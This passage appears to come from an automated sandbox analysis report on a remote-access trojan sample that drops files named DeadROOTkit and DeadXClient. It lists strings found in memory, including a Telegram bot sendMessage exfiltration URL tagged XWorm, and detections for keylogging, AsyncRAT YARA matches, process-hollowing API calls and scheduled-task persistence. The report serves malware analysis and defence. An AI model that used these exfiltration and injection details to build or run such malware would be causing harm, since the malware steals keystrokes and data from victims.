                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                          Source: lsass.exe, 0000000C.00000002.2957284217.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                          Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                          Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                          Source: svchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.msoftP
                          Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                          Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                          Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                          Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
                          Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
                          Source: powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.drString found in binary or memory: https://api.telegram.org/bot
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%
                          Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to log keystrokes (.Net Source)
                          Source: DeadROOTkit.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                          Source: DeadROOTkit.exe.2.dr, XLogger.cs.Net Code: KeyboardLayout
                          Source: C:\Users\Public\DeadROOTkit.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          Operating System Destruction

                          barindex
                          Protects its processes via BreakOnTermination flag
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: 01 00 00 00 Jump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\Public\DeadXClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\Public\Deadsvchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          .NET source code contains very large strings
                          Source: mIURiU8n2P.exe, -Program-.csLong String: Length: 253952
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7F0C4D NtWriteVirtualMemory,4_2_00007FFD9B7F0C4D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7F0FD4 NtResumeThread,4_2_00007FFD9B7F0FD4
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7F0F10 NtSetContextThread,4_2_00007FFD9B7F0F10
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7F0A2E NtUnmapViewOfSection,4_2_00007FFD9B7F0A2E
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001854 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,6_2_0000000140001854
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC6429B0 NtEnumerateValueKey,NtEnumerateValueKey,11_2_00000225DC6429B0
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AE2618 NtQueryDirectoryFileEx,GetFileType,StrCpyW,12_2_00000202C0AE2618
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AE2118 NtQuerySystemInformation,StrCmpNIW,12_2_00000202C0AE2118
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF2129B0 NtEnumerateValueKey,NtEnumerateValueKey,16_2_000002BAAF2129B0
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\DeadROOTkit
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_qnblsrzc.xue.ps1Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeCode function: 0_2_00007FFD9B800C110_2_00007FFD9B800C11
                          Source: C:\Users\Public\DeadXClient.exeCode function: 1_2_00007FFD9B7F6F661_2_00007FFD9B7F6F66
                          Source: C:\Users\Public\DeadXClient.exeCode function: 1_2_00007FFD9B7F7D121_2_00007FFD9B7F7D12
                          Source: C:\Users\Public\DeadXClient.exeCode function: 1_2_00007FFD9B7F0E791_2_00007FFD9B7F0E79
                          Source: C:\Users\Public\DeadXClient.exeCode function: 1_2_00007FFD9B7F17991_2_00007FFD9B7F1799
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8012E92_2_00007FFD9B8012E9
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B805F062_2_00007FFD9B805F06
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8021D12_2_00007FFD9B8021D1
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B806CB22_2_00007FFD9B806CB2
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8046DD2_2_00007FFD9B8046DD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EF6494_2_00007FFD9B7EF649
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EB2FA4_2_00007FFD9B7EB2FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EE3194_2_00007FFD9B7EE319
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7EFDD94_2_00007FFD9B7EFDD9
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A06F4186_3_000002E86A06F418
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A06B1506_3_000002E86A06B150
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A06B35C6_3_000002E86A06B35C
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A0717786_3_000002E86A071778
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001CDC6_2_0000000140001CDC
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002D546_2_0000000140002D54
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400024306_2_0000000140002430
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400031D86_2_00000001400031D8
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400012746_2_0000000140001274
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A0A00186_2_000002E86A0A0018
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BD506_2_000002E86A09BD50
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BF5C6_2_000002E86A09BF5C
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A0A23786_2_000002E86A0A2378
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8A30E97_2_00007FFD9B8A30E9
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_3_00000225DC62177811_3_00000225DC621778
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_3_00000225DC61B35C11_3_00000225DC61B35C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_3_00000225DC61F41811_3_00000225DC61F418
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_3_00000225DC61B15011_3_00000225DC61B150
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC65237811_2_00000225DC652378
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BF5C11_2_00000225DC64BF5C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC65001811_2_00000225DC650018
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BD5011_2_00000225DC64BD50
                          Source: C:\Windows\System32\lsass.exeCode function: 12_3_00000202C0AC177812_3_00000202C0AC1778
                          Source: C:\Windows\System32\lsass.exeCode function: 12_3_00000202C0ABB35C12_3_00000202C0ABB35C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_3_00000202C0ABF41812_3_00000202C0ABF418
                          Source: C:\Windows\System32\lsass.exeCode function: 12_3_00000202C0ABB15012_3_00000202C0ABB150
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AF237812_2_00000202C0AF2378
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBF5C12_2_00000202C0AEBF5C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AF001812_2_00000202C0AF0018
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBD5012_2_00000202C0AEBD50
                          Source: C:\Users\Public\Deadsvchost.exeCode function: 13_2_00007FFD9B800E7913_2_00007FFD9B800E79
                          Source: C:\Users\Public\Deadsvchost.exeCode function: 13_2_00007FFD9B80179913_2_00007FFD9B801799
                          Source: C:\Windows\System32\svchost.exeCode function: 14_3_000002A6612DB35C14_3_000002A6612DB35C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_3_000002A6612E177814_3_000002A6612E1778
                          Source: C:\Windows\System32\svchost.exeCode function: 14_3_000002A6612DB15014_3_000002A6612DB150
                          Source: C:\Windows\System32\svchost.exeCode function: 14_3_000002A6612DF41814_3_000002A6612DF418
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BF5C14_2_000002A66130BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66131237814_2_000002A661312378
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BD5014_2_000002A66130BD50
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66131001814_2_000002A661310018
                          Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002BAAF1F177816_3_000002BAAF1F1778
                          Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002BAAF1EB35C16_3_000002BAAF1EB35C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002BAAF1EB15016_3_000002BAAF1EB150
                          Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002BAAF1EF41816_3_000002BAAF1EF418
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BF5C16_2_000002BAAF21BF5C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF22237816_2_000002BAAF222378
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BD5016_2_000002BAAF21BD50
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF22001816_2_000002BAAF220018
                          Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000026A8799F41817_3_0000026A8799F418
                          Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000026A8799B35C17_3_0000026A8799B35C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000026A879A177817_3_0000026A879A1778
                          Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000026A8799B15017_3_0000026A8799B150
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879D001817_2_0000026A879D0018
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBF5C17_2_0000026A879CBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879D237817_2_0000026A879D2378
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBD5017_2_0000026A879CBD50
                          Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001795377B15019_3_000001795377B150
                          Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001795378177819_3_0000017953781778
                          Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001795377B35C19_3_000001795377B35C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001795377F41819_3_000001795377F418
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABD5019_2_00000179537ABD50
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537B237819_2_00000179537B2378
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABF5C19_2_00000179537ABF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537B001819_2_00000179537B0018
                          Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002295D53B15020_3_000002295D53B150
                          Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002295D53F41820_3_000002295D53F418
                          Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002295D53B35C20_3_000002295D53B35C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002295D54177820_3_000002295D541778
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BD5020_2_000002295D56BD50
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D57001820_2_000002295D570018
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BF5C20_2_000002295D56BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D57237820_2_000002295D572378
                          Source: C:\Windows\System32\svchost.exeCode function: String function: 000002A6612E2770 appears 36 times
                          Source: C:\Windows\System32\svchost.exeCode function: String function: 0000026A879A2770 appears 36 times
                          Source: C:\Windows\System32\svchost.exeCode function: String function: 0000017953782770 appears 36 times
                          Source: C:\Windows\System32\svchost.exeCode function: String function: 000002295D542770 appears 36 times
                          Source: C:\Windows\System32\winlogon.exeCode function: String function: 00000225DC622770 appears 36 times
                          Source: C:\Windows\System32\lsass.exeCode function: String function: 00000202C0AC2770 appears 36 times
                          Source: C:\Windows\System32\dllhost.exeCode function: String function: 000002E86A072770 appears 36 times
                          Source: C:\Windows\System32\dwm.exeCode function: String function: 000002BAAF1F2770 appears 36 times
